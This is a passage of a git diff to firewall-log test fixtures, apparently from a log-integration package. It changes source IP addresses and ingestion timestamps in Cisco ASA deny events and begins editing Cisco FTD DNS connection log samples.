inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18919,8 +18919,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18954,7 +18954,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18963,8 +18963,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722344200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100652300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19000,8 +19000,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19035,7 +19035,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19044,8 +19044,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722348200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100657600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19081,8 +19081,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19116,7 +19116,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19125,8 +19125,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722352600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100663100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19162,8 +19162,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19197,7 +19197,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19206,8 +19206,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722357Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100669Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19243,8 +19243,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19278,7 +19278,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19287,8 +19287,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722361200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100673400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19324,8 +19324,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19359,7 +19359,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19368,8 +19368,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722365900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100677800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19405,8 +19405,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19440,7 +19440,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19449,8 +19449,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722370300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100681500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19486,8 +19486,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19521,7 +19521,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19530,8 +19530,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722375500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100686Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19567,8 +19567,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19602,7 +19602,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19611,8 +19611,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722380Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100691900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19648,8 +19648,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19683,7 +19683,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19692,8 +19692,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722384200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100697800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19729,8 +19729,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19764,7 +19764,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19773,8 +19773,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722388400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100703800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19810,8 +19810,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19845,7 +19845,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19854,8 +19854,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722392600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100709700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19891,8 +19891,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19926,7 +19926,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19935,8 +19935,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722397600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100715500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19972,8 +19972,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20007,7 +20007,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20016,8 +20016,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722401500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100721300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20053,8 +20053,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20088,7 +20088,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20097,8 +20097,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722405300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100727200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20134,8 +20134,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20169,7 +20169,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20178,8 +20178,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722408900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100733200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20215,8 +20215,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20250,7 +20250,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20259,8 +20259,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722412600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100739200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20296,8 +20296,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20331,7 +20331,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20340,8 +20340,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722416400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100745Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20377,8 +20377,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20412,7 +20412,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20421,8 +20421,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722420400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100750900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20458,8 +20458,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20493,7 +20493,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20502,8 +20502,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722424100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100756800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20539,8 +20539,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20574,7 +20574,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20583,8 +20583,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722428100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100762700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20620,8 +20620,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20655,7 +20655,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20664,8 +20664,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722433Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100768500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20701,8 +20701,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20736,7 +20736,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20745,8 +20745,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722436900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100774300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20782,8 +20782,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20817,7 +20817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20826,8 +20826,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722441400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100779800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20863,8 +20863,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20898,7 +20898,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20907,8 +20907,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722445600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100783900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log index ce15fb2bdfa..996a1347fea 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log @@ -1,21 +1,21 @@ -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z 